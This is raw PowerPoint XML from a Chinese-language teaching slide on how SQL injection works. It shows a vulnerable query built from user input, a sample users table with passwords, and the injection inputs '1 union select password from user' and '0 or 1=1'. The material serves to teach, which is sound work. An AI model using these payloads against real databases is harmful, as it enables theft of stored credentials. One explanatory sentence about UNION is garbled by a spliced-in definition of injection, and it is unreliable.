              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B732BB-C6B2-468C-89E1-321B18DB1875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8810091" y="4719104"/>
            <a:ext cx="1871045" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>······</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4062869241"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428990" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据。中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021625" y="701566"/>
            <a:ext cx="1936180" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3181DAA7-4EA6-4FF3-879A-B90A204FB4C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447869" y="1665173"/>
            <a:ext cx="7306483" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Select username from users where  id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>用户输入；</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="24" name="表格 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C91E0306-DCD6-4FC0-A69B-D65F544D8852}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="680018815"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7577436" y="1402862"/>
          <a:ext cx="4166695" cy="2315448"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="555505">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3217910847"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1805595">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="289602206"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1805595">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2781414587"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>username</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>password</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2334648633"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Admin</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Password</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2527666147"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Bob</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>123</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="656364240"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>user1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>pass1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2831422024"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FC3F1E9-2FB1-479A-B2AE-B0E381732E25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9449689" y="1019073"/>
            <a:ext cx="1028578" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FE02436-A834-441E-BD04-8AE933387B5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567497" y="2505130"/>
            <a:ext cx="5203601" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>用户输入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Admin       </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FA47985-4B35-4EC7-AA14-77BB4831EEDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="884243" y="3757031"/>
            <a:ext cx="6096000" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>1 union select password from user        ?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文本框 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC1D178A-7F15-4B79-A463-5F44590FAF09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2104039" y="3044401"/>
            <a:ext cx="3083782" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>2	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Bob</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="文本框 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBC6A036-2FAE-4B34-BC4A-7FE4D3022C9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793846" y="4897519"/>
            <a:ext cx="10757452" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Select username from users where  id= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>1 union select password from user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="文本框 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A39016F4-2EC2-4F48-A760-0F2B20F2B1F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="884243" y="4252379"/>
            <a:ext cx="5734389" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>0 or 1=1             ?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21FE0499-B2CC-48B7-B6F6-3FB8D1B2CE43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793846" y="5392867"/>
